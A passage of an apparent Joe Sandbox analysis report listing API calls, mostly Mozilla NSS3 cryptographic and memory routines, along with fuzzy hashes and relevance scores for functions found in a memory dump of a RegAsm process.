Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C1C1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1C1ED0

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: b4baa3974617604417b30ac718fdc3fd34902c0c2b4eeb80cab159a10e0f6d47
Instruction ID: 933e454d7621d2d17baee38904b9c791231ee3d949a55614a65b5bd058585853
Opcode Fuzzy Hash: b4baa3974617604417b30ac718fdc3fd34902c0c2b4eeb80cab159a10e0f6d47
Instruction Fuzzy Hash: 5A516875A40309CFDB04CF98C884BAEBBB6BF59308F254129E819AB750D739E945CB91

Function 6C1CCF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C1CD01E

Part of subcall function 6C19E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C19E5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C1CD055

Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
Part of subcall function 6C19ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
Part of subcall function 6C19ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
Part of subcall function 6C19ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C1CCC55,00000107,00000000), ref: 6C1CD079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1CD08C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: 45e53461538a9572d0c4b8d372f9ad3ce2d9cea5217f7caf9c16e43f27b2b6ac
Instruction ID: 84a2e25d5b111d27b467d8eaab2a4fa9dc274d8fbfda6929b9f054149124dcf6
Opcode Fuzzy Hash: 45e53461538a9572d0c4b8d372f9ad3ce2d9cea5217f7caf9c16e43f27b2b6ac
Instruction Fuzzy Hash: D44190B1A04219DBE710CF19CC40BA9F7F5FF54308F0586AAE90CA7751E331AA96CB91

Function 6C1C3D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6C1C127F,?), ref: 6C1C3D89

Part of subcall function 6C1C06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C1C2E70,00000000), ref: 6C1C0701

SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6C1C3DD3

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$HashLookupTableUtil$Alloc_ConstFind
String ID:
API String ID: 99596740-0
Opcode ID: 50cb1821ba4dec4762cac2fbe34216592ae04d025ea2927eeffadd63fe34cdae
Instruction ID: 7acee301afa875b9c85c1a98e212a57c7e9f0b4a9666615be2fb3d6b0255263e
Opcode Fuzzy Hash: 50cb1821ba4dec4762cac2fbe34216592ae04d025ea2927eeffadd63fe34cdae
Instruction Fuzzy Hash: CF310275B0252497E71486199840BE97364AB7232CFE50626FE15C7FC1EB2DE80387C3

Function 6C1C2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C1C1289,?), ref: 6C1C2D72

Part of subcall function 6C1C3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C1C2CA7,E80C76FF,?,6C1C1289,?), ref: 6C1C33E9
Part of subcall function 6C1C3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C1C342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1C1289,?), ref: 6C1C2D61

Part of subcall function 6C1C0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1C0B21
Part of subcall function 6C1C0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1C0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C1C1289,?), ref: 6C1C2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C1C1289,?), ref: 6C1C2DAF

Part of subcall function 6C17B8F0: PR_CallOnceWithArg.NSS3(6C2B2178,6C17BCF0,?), ref: 6C17B915
Part of subcall function 6C17B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C17B933
Part of subcall function 6C17B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C17B9C8
Part of subcall function 6C17B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C17B9E1

Part of subcall function 6C1C0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C1C2A90,E8571076,?,6C1C2A7C,6C1C21F1,?,?,?,00000000,00000000,?,?,6C1C21DD,00000000), ref: 6C1C0A66

Part of subcall function 6C1C3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C1C2D1E,?,?,?,?,00000000,?,?,?,?,?,6C1C1289), ref: 6C1C3348

Part of subcall function 6C1C06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C1C2E70,00000000), ref: 6C1C0701

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: a21f41caf40952cc917352a089ff24020205d51be5847369dd1374b8ab8d10a1
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 1131EAB6B00201ABDB009F64EC44BAA3765AF7531DF150130FD159B791EB35E929C7A3

Function 6C156C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C156C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C156CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C156CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C278FE0), ref: 6C156CFE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 24ee2da3e8ff0c24edf40d5574fb52e4afbd7a3b96c6177b366aa21449c4ada5
Instruction ID: 41e0675fe71322754243ee3ccbce1e24bdcc4830a2c7dc925a27181e03681520
Opcode Fuzzy Hash: 24ee2da3e8ff0c24edf40d5574fb52e4afbd7a3b96c6177b366aa21449c4ada5
Instruction Fuzzy Hash: B231ACB1A0021A9FEB08CF65C881ABFBBF5EF99248B50442DD915E7710EB31D915CBE0

Function 6C264F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C264F5D
free.MOZGLUE(?), ref: 6C264F74
free.MOZGLUE(?), ref: 6C264F82
GetLastError.KERNEL32 ref: 6C264F90

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: f739e6da3acb8150c1dfbd14270670d4e87eb3d1f231e5ee031c702879e215c7
Instruction ID: e368b533f659d08ce8e9282502cd5c698058849692bfe534945287b6f1696517
Opcode Fuzzy Hash: f739e6da3acb8150c1dfbd14270670d4e87eb3d1f231e5ee031c702879e215c7
Instruction Fuzzy Hash: 64314B75A0020E4BDB01DFAADC95BDFB3B8EF45359F040225FC55A7B81DB35A904C6A1

Function 6C194FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C19B60F,00000000), ref: 6C195003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C19B60F,00000000), ref: 6C19501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C19B60F,00000000), ref: 6C19504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C19B60F,00000000), ref: 6C195064

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: c371a1a420013a724979cbb320144bf9075ce3f989a769be086880fc967972e4
Instruction ID: cfe3e1b35c7b138f8af491d0a1c215feefa3d964a98ea36800315fb26fa2a815
Opcode Fuzzy Hash: c371a1a420013a724979cbb320144bf9075ce3f989a769be086880fc967972e4
Instruction Fuzzy Hash: 273128B4A05606DFDB04EF68C48466ABBF4FF08309F158A69D869D7741E731E890CBE1

Function 6C1C2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C1C2E08

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C1C2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C1C2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1C2E95

Part of subcall function 6C1B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B1228
Part of subcall function 6C1B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C1B1238
Part of subcall function 6C1B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B124B
Part of subcall function 6C1B1200: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B125D
Part of subcall function 6C1B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C1B126F
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C1B1280
Part of subcall function 6C1B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C1B128E
Part of subcall function 6C1B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C1B129A
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C1B12A1

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: d80a052276e07c85f112f5c3c79d4975810684126a6ae1f9709d5165013e90e8
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: C821D4B1F003454BE700CF549D44BAA3764AFB170CF221269ED087B742F7B9E69886A2

Function 6C17ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C17ACC2

Part of subcall function 6C152F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C152F0A
Part of subcall function 6C152F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C152F1D

Part of subcall function 6C152AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C150A1B,00000000), ref: 6C152AF0
Part of subcall function 6C152AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C152B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C17AD5E

Part of subcall function 6C1957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C15B41E,00000000,00000000,?,00000000,?,6C15B41E,00000000,00000000,00000001,?), ref: 6C1957E0
Part of subcall function 6C1957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C195843

CERT_DestroyCertList.NSS3(?), ref: 6C17AD36

Part of subcall function 6C152F50: CERT_DestroyCertificate.NSS3(?), ref: 6C152F65
Part of subcall function 6C152F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C152F83

free.MOZGLUE(?), ref: 6C17AD4F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 1d9b28647a3e680dcee9da70ef056080addb93c8faab78e5c8624dd30e1bb1af
Instruction ID: e884bfcb6e8baba41176f2bb3053c18f9e64de02d59704466f70b66038ecff31
Opcode Fuzzy Hash: 1d9b28647a3e680dcee9da70ef056080addb93c8faab78e5c8624dd30e1bb1af
Instruction Fuzzy Hash: 3821C6B2D002048BEB20DFA4D9096EE77B4AF15248F455069DC1577701FB31EA59CBB1

Function 6C1A3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C1A3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C1A3CAE
PR_Unlock.NSS3(?), ref: 6C1A3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C1A3D02

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: e131a06cbb45880aea7afc9af6b8004803ecce8cdfa0e536a1c746a9d48f26ac
Instruction ID: 203e47a29be18aaa89f558e85e51605950200f1cd1274a1e9189e149c40919d7
Opcode Fuzzy Hash: e131a06cbb45880aea7afc9af6b8004803ecce8cdfa0e536a1c746a9d48f26ac
Instruction Fuzzy Hash: D011D679A00204AFDB00EF64DC48B9A37B8EF09368F554465ED048B711E731ED46CBE1

Function 6C1AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C1AF0AD,6C1AF150,?,6C1AF150,?,?,?), ref: 6C1AECBA

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C1AECD1

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C1AED02

Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C1AED5A

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 0cfdadb512a2a5bf1d551f20bfcd1769fbbdfcf071b9d3793b065159997badc3
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: FF21A4B5A007425BE700CF25D944B52B7E4BFA4348F25C219E81C97661F770E6A5CAD0

Function 6C1DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEE14

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

memcpy.VCRUNTIME140(?,?,6C1C9767,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEE33

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 2869f594357899240d5afc8a67f73aa245ba7f2cffbbe392e5212b4997b150f3
Instruction ID: 2175de582dc4607578c899f2e25dbb6a8dbf5eb24e70aaef62d05a5b353bf059
Opcode Fuzzy Hash: 2869f594357899240d5afc8a67f73aa245ba7f2cffbbe392e5212b4997b150f3
Instruction Fuzzy Hash: 7711A3B1A00B07ABEB109E65DCC4B46F3A8EF1035EF224531E91982A40E731F664CBE1

Function 6C178DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

